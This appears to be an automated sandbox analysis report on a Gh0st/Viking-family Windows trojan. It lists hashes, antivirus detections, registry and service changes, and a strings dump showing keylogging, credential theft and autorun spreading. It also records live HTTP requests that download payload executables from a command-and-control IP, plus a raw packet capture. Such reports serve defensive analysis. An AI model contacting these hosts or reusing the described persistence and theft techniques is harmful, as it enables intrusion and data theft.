Analysis Date | 2015-02-22 18:00:19 |
---|---|
MD5 | 41ddfa1c6527d4471b12bbe1b94f9b52 |
SHA1 | bdc45af2da5a8363dae790499ec9c21c5dea1be8 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 1da0f04d754bc9bc60fd62a611662088 sha1: 35c4e152f19e418b19a28cace15516fba0c6e44e size: 6144 | |
Section | .rsrc md5: feec81e768b70b1326b9aa3a248074aa sha1: a8c7180a618b34e3765a50df3f06807084ed5d26 size: 116736 | |
Section | .tc md5: 6eca814a49771af43d45eaba37702ea5 sha1: da0b2544a8dd9f8a0b07617189e080b949898a89 size: 76288 | |
Timestamp | 2011-11-25 12:02:17 | |
PEhash | 11d42609867d277c812eaf0ed5d28319d08a55cf | |
IMPhash | f683366ddf493cd68d5fc61a44ca3135 | |
AV | 360 Safe | Virus.Win32.Agent.O |
AV | Ad-Aware | Win32.Viking.AR |
AV | Alwil (avast) | OnLineGames-GJV [Trj]:Viking-CF:Win32:Viking-CF |
AV | Arcabit (arcavir) | Win32.Viking.AR:Trojan.Redosdru.Gen.1 |
AV | Authentium | W32/Viking.A.gen!Eldorado |
AV | Avira (antivir) | W32/Fujacks.DR |
AV | BullGuard | Win32.Viking.AR |
AV | CA (E-Trust Ino) | Win32/Zegost.B!generic |
AV | CAT (quickheal) | W32.Agent.DP |
AV | ClamAV | Worm.Fujack-55 |
AV | Dr. Web | Trojan.DownLoader9.7320 |
AV | Emsisoft | Win32.Viking.AR |
AV | Eset (nod32) | Win32/Agent.DP virus |
AV | Fortinet | W32/Torr.BH!tr.bdr |
AV | Frisk (f-prot) | W32/Viking.A.gen!Eldorado |
AV | F-Secure | Win32.Viking.AR |
AV | Grisoft (avg) | BackDoor.Generic_r.ZL |
AV | Ikarus | P2P-Worm.Win32.Palevo |
AV | K7 | Virus ( 00108a531 ) |
AV | Kaspersky | Virus.Win32.Agent.dp |
AV | MalwareBytes | Trojan.ServStart |
AV | Mcafee | Error Scanning File |
AV | Microsoft Security Essentials | Virus:Win32/Viking.NK |
AV | MicroWorld (escan) | Win32.Viking.AR |
AV | Rising | Win32.Agent.hn |
AV | Sophos | W32/FuzVir-A |
AV | Symantec | W32.Loorp.A!inf |
AV | Trend Micro | PE_JEEFO.D |
AV | VirusBlokAda (vba32) | Virus.Win32.Koklek |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_LOCAL_MACHINE\software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST\netsvcs ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Parameters\ServiceDll ➝ C:\WINDOWS\system32\hackeyes.dll\\x00 |
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Description ➝ \\xbc\\xe0\\xb2\\xe2\\xba\\xcd\\xbc\\xe0\\xca\\xd3\\xd0\\xc2\\xd3\\xb2\\xbc\\xfe\\xc9\\xe8\\xb1\\xb8\\xb2\\xa2\\xd7\\xd4\\xb6\\xaf\\xb8\\xfc\\xd0\\xc2\\xc9\\xe8\\xb1\\xb8\\xc7\\xfd\\xb6\\xaf\\x00 |
Creates File | C:\WINDOWS\system32\hackeyes.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Service | Microsoft Device Manager - %SystemRoot%\System32\svchost.exe -k netsvcs |
Starts Service | MDM Serverice |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Creates File | C:\WINDOWS\system32\dllcache\lsasvc.dll |
---|---|
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates File | PIPE\SfcApi |
---|---|
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\qmgr.dll |
Creates File | C:\WINDOWS\system32\mspmsnsv.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat" |
Starts Service | WmdmPmSN |
Process
↳ Pid 828
Process
↳ Pid 872
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WZCV4JYN\desktop.ini |
Creates File | NtHid |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KEGVIQDV\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | PIPE\lsarpc |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KKZF8Z9O\desktop.ini |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\TEMP\NtHid.sys |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0PQRSTU7\desktop.ini |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\WINDOWS\TEMP\NtHid.sys |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Creates Mutex | c:!documents and settings!networkservice!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!networkservice!cookies! |
Creates Mutex | c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! |
Creates Service | NtHid - C:\WINDOWS\TEMP\NtHid.sys |
Winsock DNS | 204.11.56.45 |
Winsock DNS | www.490a-B8B5-9B8C1E870B0C.com |
Winsock DNS | www.baidu.com |
Winsock DNS | pc1.114central.com |
Process
↳ Pid 1132
Process
↳ Pid 1228
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Process
↳ Pid 1892
Process
↳ Pid 1216
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Type ➝ 288 |
---|---|
Creates File | pipe\net\NtControlPipe10 |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates Mutex | AAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8= |
Network Details:
DNS | luo2374041234.f3322.org Type: A 219.235.4.118 |
---|---|
DNS | www.a.shifen.com Type: A 180.76.3.151 |
DNS | pc1.114central.com Type: A 204.11.56.45 |
DNS | nbtj.114anhui.com Type: A |
DNS | www.baidu.com Type: A |
DNS | www.490a-B8B5-9B8C1E870B0C.com Type: A |
HTTP GET | http://204.11.56.45/ko/01.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://204.11.56.45/ko/02.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://204.11.56.45/ko/03.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
Flows TCP | 192.168.1.1:1031 ➝ 219.235.4.118:8086 |
Flows TCP | 192.168.1.1:1033 ➝ 204.11.56.45:80 |
Flows TCP | 192.168.1.1:1034 ➝ 219.235.4.118:8086 |
Flows TCP | 192.168.1.1:1035 ➝ 204.11.56.45:80 |
Flows TCP | 192.168.1.1:1036 ➝ 204.11.56.45:80 |
Raw Pcap
0x00000000 (00000) 47683073 74e8 Gh0st. 0x00000000 (00000) 47455420 2f6b6f2f 30312e65 78652048 GET /ko/01.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4 0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive....... 0x000000b0 (00176) eb626c69 6ce8c240 0c38cec6 c070e8f6 .blil..@.8...p.. 0x000000c0 (00192) 99cd1b9e 319483f8 bd407c03 683603d0 ....1....@|.h6.. 0x000000d0 (00208) 7d21b108 3bfe03c1 913527ce 6fbf76fd }!..;....5'.o.v. 0x000000e0 (00224) 252eb3 %.. 0x00000000 (00000) 47683073 74e7 Gh0st. 0x00000000 (00000) 47455420 2f6b6f2f 30322e65 78652048 GET /ko/02.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4 0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive....... 0x000000b0 (00176) eb626c69 6ce8c240 0c10 .blil..@.. 0x00000000 (00000) 47455420 2f6b6f2f 30332e65 78652048 GET /ko/03.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4 0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive....... 0x000000b0 (00176) eb626c69 6ce8c240 0c10 .blil..@..
Strings
y z Gh0s E.P \ghh ijpp . wilg.x [ {| stu v . f .}~ wx . .. .O... 080404b0 3, 6, 0, 0 \A\..\..\ Comments CompanyName Copyright ? 2008 \Device\NtHid Device Protect Application \Driver\Tcpip FILE FileDescription FileVersion InternalName IoDriverObjectType @jjj jjjj jjjjh jjjjj jjjjjjjjh LegalCopyright LegalTrademarks Microsoft Corporation Microsoft(R) Windows(R) Operating System \??\NtHid ObReferenceObjectByName OriginalFilename PrivateBuild ProductName ProductVersion PsLookupProcessByProcessId SpecialBuild StringFileInfo svchost.dll Translation VarFileInfo VS_VERSION_INFO ~0;~,} ?$?(?,?0? 0 0$0(0,0004080 0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0 0%0/0@0E0R0f0 0!0.0C0M0W0 0&0;0G0M0o0 0+020e0k0 0050Q0 0 060;0j0 0(090?0F0M0d0 0,0A0^0s0 0:0J0d0y0 00p0t0 0 1!1'181S1h1o1 0!1*1=1M1V1y1 0&1,181L1 0#161f1t1x1|1 [%02d/%02d/%d %02d:%02d:%02d] (%s) ; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X; +0G0x0 0j/0@0E0R0f0 :#:0:K:[:`:i:t: 0p2t2x2|2 0T0X0\0`0d0h0l0p0t0x0| ;+;0;?;\;w; :&:0:>:W: 1$1*10161<1B1H1N1T1Z1`1f1l1r1x1~1 1$111:1G1P1]1 1(1/1o1w1 1*1<1Z1l1 1)181B1P1m1|1 1"1B1U1i1t1 1.1E1K1Z1h1 1!1F1m1 1$1g1t1 1@1P1^1 1.1S1[1`1m1 127.0.0.1 localhost 191I1U1 1b2w2}2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ;1<=<B<J< ="='=,=1=>=F= 1=>=F= :1G1P1]1 1K1Z1h1 1l1.dll ??1type_info@@UAE@XZ ?%?2???]? ?%?2?]? 207C6A67-5861-4aaf-A336-C255C7AE4C57 2+222=2 2,22282>2D2J2O2U2b2h2n2t2 2%292D2 2(2B2N2W2c2l2x2 2(2B2N2W2c2n 2<2Q2W2h2p2 2<2Q{h2p2 2&3F3N3`3k3 2?3H3Q 2?3H3Q3 %-24s %-15s %-24s %-15s 0x%x(%d) %-24s %-15s %s 2D2J2O2U2b1n2t2 >)>2>E>S>\>s> >2>E>S>\>s> 2K2f2v2 :2;O;W;\;c;i;o;u;|; 2T2d2{2 2Y2w2}2 ??2@YAPAXI@Z 313Q3V3_3o3x3 #32770 3!303?3 3$30363X3j3 3$30l3Xk 3!313W3w3 3 3(313;3^3 3&3+333@3T3e3 3)33393\3h3y3 3#3+3t3}3 3*353@3M3T3c3 3#3W3b3 343=3B3j3p3|3 3(4]4c4 3=4f4k4 353Q3}3 \360ACC.dat \360ACC.log \\.\360SpShadow0 360tray.exe *37}CC ;3D;H;L ? ?*?3???D?N?W?a?o?y? ;3<;<N< 3r4x4~4 @3T3e3 ??3@YAXPAX@Z <)=3===Z=a=y= {4_^]3 4&414]4 4$4-444A4J4Y4_4 4)4?4^4e4 44494A4 4%4+4G4 4%4+4G4z4 4(484<4@4D4H4L4P4T4X4h4l4p4t4x4 4+4B4N4[4b4 4)4I4a4 4#4L4r4 4/5K5V5 49-E88E-4c47-98DC :!:,:4:C:v: :,:4:@:\:d:p: =,=4=@=\=h= ; <4<@<H<x< :*:4:P:q: 4Q5e5x 4Q5e5x5 4R4Y4l4y4 5(51585 5$5)565K5b5t5 5#575?5N5 5!6&6/6 )56Ab5t5 5<6d6v6|6 5A5L5_5i5 ;!;+;5;?;C;J; ;!;+;5;?;C;J;P;Z;d;n;x; :5:F:Y:w:|: ;(;5;?;J;T;_;i;z; 5K5Q5a5 5U5h5q5 6$636<6B6M6W6 6 6(626?6H6Q6c6l6 6%6.6:6B6Y6^6i6 6.6:6C6M6W6\6 6'6.6F6K6 6 6<6H6d6p6 6<6]6i6 6)6J6e6v6 6!71767D7R7^7i7p7 696P6Y6~6 :6;B;P;g;x; >!>&>6>G>g>s> 6o7t7x7|7 ;7<><`< 738K8f8 7&727;7J7S7[7v7 7(767<7l7 7#767?7N7T7]7i7s7x7 777>7f7 777E7Q7X7d7l7v7 7:7A7b7v7 7,7L7P7d7p7x7 7'7R7_7 7 8?8N8n8 7{8 9?9p9 7 8S8u8 7&8V8h8 7?;K<?= 7k738w8 7L7Y7h7u7 ?7N7T7] 7.|qCC @.&'85 8,868<8A8K8Q8[8f8r8|8 8-8<8^8 8#8(8-8:8J8 8(8.898E8J8O8[8`8i8o8z8 889_9k9 8(8D8P8l8x8 8=8T8\8b8h8s8x8~8 8*8u8z8 8.8W8n8u8 8 9 9e9l9{9 8"9E9h9 >!>*>8>B>H>V>`> >!>*>8>B>H>V>`>n>t> :8;B;V;`; ;8;C;V;j;u; ;8<<<@<D<H<L<P<d<p< 8E:4;@=D=H=L=P=T=X=\=`=d=h=l=p=t=P?`?j? 9*:/$: 909D9P9l9t9 9$:-:3:8: 94A7A7DA-6D69-472e-8981-DBC71C77FC66 959S9^9 9&:5:F:Y:w:|: 9*:/:6: @\96DBA2^ 979A9}9 9!91969I9N9^9c9r9w9|9 9 9-9;9A9F9 9 9[9`9g9m9s9~9 999`9i9 9&9/9>9Q9e 9&9/9>9Q9e9o9{9 -9;9A9F9 9A:L:R:W:^:d: 9%:J:`: ~(9~$u 9.:U:p:}: A1O1k2y2%4*4 A4J4Y4_4 AAAAAA AAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ _acmdln AddAccessAllowedAce _adjust_fdiv AdjustTokenPrivileges advapi32.dll Advapi32.dll ADVAPI32.dll agX \s AllocateAndInitializeSid Application \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND AppMgmt appmgmts.dll appmgmts.dlld ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z <AtG<BtC [autorun] AVICAP32.dll avp.exe .?AVtype_info@@ =!>B>d> bdagent.exe _beginthreadex bgTLOkN BitBlt BlockInput browser Browser browser.dll buffer error buffer wrong ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB CallNextHookEx calloc CancelIo cannot be run i capCreateCaptureWindowA capGetDriverDescriptionA C:\dll.pdb C:\exe.pdb CharNextA ClearEventLogA CloseClipboard CloseDesktop CloseEventLog CloseHandle CloseServiceHandle CloseWindow \cmd.exe :C:M:d:m: Common Files ComPlus Applications CONNECT ConnectGroup ConnectNamedPipe _controlfp ControlService ControlSet\Services ConvertSidToStringSidA CopyFileA CP<Z<|< CreateCompatibleBitmap CreateCompatibleDC CreateDIBSection CreateDirectoryA CreateEventA CreateFileA CreateFileMappingA CreateMutexA CreateNamedPipeA CreatePipe CreateProcessA CreateProcessAsUserA CreateRemoteThread CreateServiceA CreateService(Parameters) CreateThread CreateToolhelp32Snapshot CreateWindowExA crypt'c CryptSvc cryptsvc.dll C:\sys.pdb CVideoCap __CxxFrameHandler _CxxThrowException D0H0L0PM D$0QhLA D$(8D* D$8RPQ @.data data error D$(cvid %d.%d.%d.%d %d.%d.%d.%d DDDDDD %d%d%d%d%d%d.bak Ddk h$ default Default .DEFAULT\Keyboard Layout\Toggle deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly DeleteCriticalSection DeleteDC DeleteFileA DeleteObject DeleteService Description DestroyCursor Device DeviceIoControl (D/fc_oL D$:f;E =@>D>H>L>P>T>X>\>`>d>h>l>p>t> DialParamsUID DisconnectNamedPipe DispatchMessageA D$ IV32 ;/;d;i;y;~; D$lRPj D$$MP42 dOCUMENTS AND sETTINGS\ Documents and Settings DOS mode. ;';D<P< D$PRPj D$<PVh D$\PWVh D$(RPj D$,RPQ D$$RPU ;D$<s! D$$SUV D$TSUVW =&=,=D=v= &=,=D=v= E8J8O8[8`8i8o8z8 EmptyClipboard empty distance tree with lengths EnableAdminTSRemote Enabled EnterCriticalSection EnumProcessModules EnumWindows ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z eParam$ _errno Error configure es.dll EventSystem ExAllocatePoolWithTag _except_handler3 ExecuUA ExFreePoolWithTag ExitProcess ExitThread ExitWindowsEx ExpandEnvironmentStringsA explorer.exe Explorer.exe EXPLORER.EXE Expor.exe FastUserSwitchingCompatibility fclose fDenyTSConnections Fdf+Fh FhURUPQ file error FindClose FindFirstFileA FindNextFileA FindResourceA FlushFileBuffers FlushViewOfFile freeaddrinfo FreeConsole FreeLibrary FreeResource FreeSid ;F<W<h<"=K=f= fwrite GDI32.dll GD]_[Y GetActiveWindow getaddrinfo GetClipboardData GetCommandLineA GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetCursorInfo GetCursorPos GetDesktopWindow GetDIBits GetDiskFreeSpaceExA GetDriveTypeA GetExitCodeProcess GetExitCodeThread GetFileAttributesA GetFileSize GetFileTime GetInputState GetKeyNameTextA GetLastError GetLengthSid GetLocalTime GetLogicalDrives GetLogicalDriveStringsA __getmainargs GetMessageA GetModuleFileNameA GetModuleFileNameExA GetModuleHandleA GetModuleInformation GetPrivateProfileSectionNamesA GetPrivateProfileStringA GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetSystemDirectoryA GetSystemInfo GetSystemMetrics GetSystemTime GetTempPathA GetThreadDesktop GetTickCount GetTokenInformation GetUrlCacheEntryInfoA GetUserObjectInformationA GetVersionExA GetVolumeInformationA GetWindowsDirectoryA GetWindowTextA GetWindowThreadProcessId Gh0st Update Ghost.exe GlobalAlloc GlobalFree GlobalLock GlobalMemoryStatusEx GlobalSize GlobalUnlock Global\UUPP %d ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z >G?S?y? =G>V>v> <H1>403 Forbidden</H1> h1l1.T \hackeyes.dat hackeyes.dll HARDWARE\DESCRIPTION\System\CentralProcessor\0 H.data :(;<;H;d;l;t; HeapAlloc HeapFree helpsvc Hotkey |$HPWS h.rdata HtrHuk http:// HTTP:// HTTP/1.0 200 OK Http/1.1 403 Forbidden HTTPS:// http://%s%s http://%s/%s/%s.exe ICClose ICCompressorFree ICOpen ICSendMessage ICSeqCompressFrame ICSeqCompressFrameEnd ICSeqCompressFrameStart iD&YomH ?=?I?\?h?v? IMM32.dll ImmGetCompositionStringA ImmGetContext ImmReleaseContext incompatible version incomplete distance tree incomplete dynamic bit lengths tree incomplete literal/length tree incorrect data check incorrect header check inflate 1.1.4 Copyright 1995-2002 Mark Adler ingCompatibil InitializeAcl InitializeCriticalSection InitializeSecurityDescriptor _initterm InstallModule InstallShield Installation Information insufficient memory InterlockedExchange Internet InternetCloseHandle Internet Explorer InternetOpenA InternetOpenUrlA InternetReadFile invalid bit length repeat invalid block type invalid distance code invalid literal/length code invalid stored block lengths invalid window size IoCreateDevice IoCreateSymbolicLink IocSymd IoDeleteDevice IoDeleteSymbolicLink IofCompleteRequest IsValidSid IsWindow IsWindowVisible i|tlh` Iu _^[ >>>i>v> _;i;z; |$`j/W ;,<J<Y<d<j<s< -k 4/ _kaspersky kca:\lsa kernel32.dll Kernel32.dll KERNEL32.dll KERNEL32.DLL KeServiceDescriptorTable KEveny keybd_event K:\Q.pdb`q ?+?>?l? =>>L>[> L$0Phx L$4QRRRRRU L$,91t L$@_^][d LeaveCriticalSection L$$_^]f L$@jdQV L$$j\Q L$L91t L$LQVS LoadCursorA LoadLibraryA LoadLibraryExA LoadResource LocalAlloc LocalFree LocalReAlloc LocalSize LockResource LookupAccountNameA LookupAccountSidA LookupPrivilegeValueA Loopt.bat L$(PQj L$,QWV L$_RasDefaultCredentials#0 L$ RQPj L$ RUPj LsaClose LsaFreeMemory LsaOpenPolicy LsaRetrievePrivateData lstrcatA lstrcmpA lstrcmpiA lstrcpyA lstrcpynA lstrlenA l$(VW3 m1\U\Kcn malloc MapViewOfFile MapVirtualKeyA m ,.CC m ,.CCC M:d:m: MDM Serverice memcpy memmove memset Messenger Microsoft Device Manager microsoft frontpage Microsoft\Network\Connections\pbk\rasphone.pbk MmGetSystemRoutineAddress MmMapLockedPagesSpecifyCache ?M?n?x? mouse_event MoveFileA MoveFileExA Movie Maker Mozilla/4.0 (compatible) MPR.dll MSN Gaming Zone mspmsnsv.dll MSVCP60.dll MSVCRT.dll MSVFW32.dll mswsock.dll MultiByteToWideChar |$$MZu' NDSUPQ need dictionary NETAPI32.dll NetLocalGroupAddMembers Netman netman.dll NetMeeting netsvcs netsvcs_0x%d NetUserAdd ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB NPRPUSj NT\Curr ntdll.dll \\.\NtHid NtHid.sys Ntmssvc ntmssvc.dll ntoskrnl.exe NtQuerySystemInformation ObfDereferenceObject ObReferenceObjectByHandle ObReferenceObjectByPointer oft\Wud OpenClipboard OpenDesktopA OpenEventA OpenEventLogA OpenInputDesktop OpenProcess OpenProcessToken OpenSCManager() OpenSCManagerA OpenServiceA OPEN=%s\%s OpenThread OpenWindowStationA +OpsSCM |otB.8 Outlook Express oversubscribed distance tree oversubscribed dynamic bit lengths tree oversubscribed literal/length tree >">/>p> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDd Parameters \Parameters PathFileExistsA pchsvc.dll __p__commode PeekNamedPipe >P?e?k? __p__fmode PhoneNumber Phvidc \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A PortNumber PostMessageA PostThreadMessageA PPPPPP PPPPPP%SystemRoot%\system32\hackeyes.dll Process32First Process32Next ProductName Program Files\Internet Explorer\iexplore.exe Program Files\WinRAR\Rar.exe PSAPI.DLL PsGetVersion PsTerminateSystemThread putchar ;<<P<x< <'<=<P<Z<|< P;Z;d;n;x; ;Q;];}; qmgr.dll QQQQQQQ QRPPPPPPVP 'q*#rrssC QSSSSSSSSj QueryServiceStatus RasDialParams!%s#0 `.rdat[ `.rdata ReadFile ReadProcessMemory realloc recycle.{645FF040-5081-101B-9F08-00AA002F954E} RECYCLER ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z REG_BINARY RegCloseKey RegCreateKeyA RegCreateKeyExA RegDeleteKeyA RegDeleteValueA REG_DWORD RegEnumKeyExA RegEnumValueA REG_EXPAND_SZ RegisterServiceCtrlHandlerA \Registry\Machine REG_MULTI_SZ RegOpenKeyA RegOpenKeyExA RegQueryValueA RegQueryValueExA RegQueryValueEx(Svchost\netsvcs) RegQueryValueEx(Type) RegSetValueExA RegSetValueEx(start) regsvc.dll REG_SZ ReleaseDC ReleaseMutex .reloc @.reloc Remote RemoteRegistry RemoveDirectoryA ResetEvent ResumeThread <'=.=R=f= -<RoA%'_h7 RPCRT4.dll RtlInitUnicodeString RtlIoU %s\*.* =;>S>}> S1[1`1m1 %sautorun.inf {schedsvc schedsvc.dll Schedule <script %s%d%d%d%d%d%d %s\desktop.txt %s\dllcache\lsasvc.dll SDPSRV %s\drivers\etc\hosts %s%d%s Security SeDebugPrivilege SelectObject SendMessageA ServiceDll ServiceMain SeShutdownPrivilege __set_app_type SetCapture SetClipboardData SetCursorPos SetEndOfFile SetErrorMode SetEvent SetFileAttributesA SetFilePointer SetFileTime SetLastError SetNamedPipeHandleState SetProcessWindowStation SetRect SetSecurityDescriptorDacl SetServiceStatus SetThreadDesktop SetUnhandledExceptionFilter __setusermatherr SetWindowsHookExA sfc_os.dll sgegpjde11207255ADAAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8= SHDeleteKeyA shell32.dll SHELL32.dll ShellExecuteA shell\explore= shell\explore\Command=%s\%s %s shell\open= shell\open\Command=%s\%s %s shell\open\Default=1 SHGetFileInfoA SHGetSpecialFolderPathA shlwapi.dll SHLWAPI.dll shsvcs.dll ShutdownWithoutLogon SizeofResource %s M -ibck -r -o+ -ep1 "%s" "%s\*" _snprintf SOFTWARE\Mi SOFTWARE\Microsoft\Windows\CurrentVersion\netcache SOFTWARE\Microsoft\Windows NT\CurrentVersion SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST SOFTWARE\Microsoft\Windows 